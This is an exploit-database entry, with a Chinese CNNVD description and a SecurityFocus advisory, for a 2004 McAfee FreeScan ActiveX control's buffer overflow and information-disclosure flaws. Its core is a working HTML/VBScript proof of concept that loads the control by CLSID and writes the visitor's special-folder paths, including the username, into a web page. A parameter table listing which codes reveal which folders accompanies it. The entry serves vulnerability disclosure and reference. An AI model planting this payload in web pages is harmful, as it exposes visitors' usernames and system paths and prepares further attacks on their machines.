https://www.exploit-db.com/exploits/23926
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-227

McAfeeFreeScan可以检测数千种病毒，基于McAfeeVirusScan引擎。McAfeeFreeScan安装和注册的COM对象对用户提交字符串缺少充分边界检查，远程攻击者可以利用这个漏洞进行基于堆栈的缓冲区溢出，可能以用户进程权限执行任意指令。McAfeeFreeScan安装时注册”McFreeScan.CoMcFreeScan.1″COM对象，在第一次使用FreeScan后，可以被本地或远程建立如：Setobject=CreateObject(“McFreeScan.CoMcFreeScan.1”)其中此对象的”ScanParam”属性对接收字符串长度缺少充分检查，提交超长数据可触发缓冲区溢出，允许用户以系统权限执行任意指令。另外McafeeFreeScan内置函数可获得用户shell文件夹，如%Windir%和”MyDocuments”，里面包含用户名，这表示使用如下方法可获得系统敏感信息：msgboxobject.GetSpecialFolderLocation(&H0024)-会弹出Windows路径msgboxobject.GetSpecialFolderLocation(&H0005)-会弹出用户名和mydocuments路径

source: http://www.securityfocus.com/bid/10077/info

Reportedly the Mcafee FreeScan 'McFreeScan.CoMcFreeScan.1' COM object is prone to a remote information disclosure vulnerability. This issue is due to a failure of the object to properly validate information access credentials.

Successful exploitation of this issue may provide an attacker with sensitive system information. The provided system information may be used to carry out further attacks against the affected system.

<OBJECT ID="MCFS" WIDTH=0 HEIGHT=0
CLASSID="CLSID:EF791A6B-FC12-4C68-99EF-FB9E207A39E6"></OBJECT>

<script language=vbscript>

sPath = MCFS.GetSpecialFolderLocation(&H0000)

'Gets the path for the desktop folder.

document.write(sPath)

'The Available parameters for the method and their return values:
'
'&H0000=desktop
'&H0002=%username%start menu/programs
'&H0005=%username%/my documents
'&H0006=%username%/favorites
'&H0007=%username%start menu/programs/startup
'&H0008=%username%/recent
'&H0009=%username%/sendto
'&H0010=%username%/desktop
'&H0013=%username%/nethood
'&H0014=%windir%/fonts
'&H0015=%username%/templates
'&H0016=all users/start menu
'&H0017=all users/start menu/programs
'&H0018=all users/start menu/programs/startup
'&H0019=all users/desktop
'&H0020=%username%/Local Settings/Temporary Internet Files
'&H0021=%username%/cookies
'&H0022=%username%/local settings/history
'&H0023=All Users/Application Data
'&H0024=%windir%
'&H0025=%windir%/system32
'&H0026=%programfiles%
'&H0027=%username%/My Documents/My Pictures
'&H0028=%username%
'&H0029=%windir%

</script>

来源:XF
名称:freescan-mcfscan-info-disclosure(15782)
链接:http://xforce.iss.net/xforce/xfdb/15782
来源:BID
名称:10077
链接:http://www.securityfocus.com/bid/10077
来源:SECUNIA
名称:11313
链接:http://secunia.com/advisories/11313
来源:BUGTRAQ
名称:20040407McAfeeFreescanActiveXInformationDisclosure[AdditionalDetails&PoC;]
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108137545531496&w;=2
来源:BUGTRAQ
名称:20040407McafeeFreeScan-RemoteBufferOverflowandPrivateInformationDisclosure
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108136872711898&w;=2
来源:FULLDISC
名称:20040407Symantec,McAfeeandPandaActiveXcontrols
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2004-April/019891.html
来源:FULLDISC
名称:20040407McafeeFreeScan-RemoteBufferOverflowandPrivateInformationDisclosure
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2004-April/019877.html
来源：NSFOCUS
名称：6294
链接：http://www.nsfocus.net/vulndb/6294